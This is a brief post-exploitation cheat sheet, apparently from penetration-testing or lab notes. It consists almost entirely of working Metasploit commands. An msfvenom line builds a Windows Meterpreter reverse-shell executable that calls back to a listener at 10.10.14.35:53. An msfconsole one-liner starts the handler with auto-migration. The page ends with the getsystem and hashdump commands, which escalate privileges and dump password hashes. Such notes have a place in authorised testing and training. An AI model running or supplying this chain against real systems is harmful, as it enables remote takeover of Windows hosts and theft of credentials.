Post Exploitation

Metasploit

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.35 LPORT=53 -f exe -o rshell.exe

sudo msfconsole -q -x "use exploit/multi/handler;set PAYLOAD windows/x64/meterpreter/reverse_tcp;set AutoRunScript post/windows/manage/migrate;set LHOST 10.10.14.35;set LPORT 53;run -j"

>getsystem 
>hashdump 

Last updated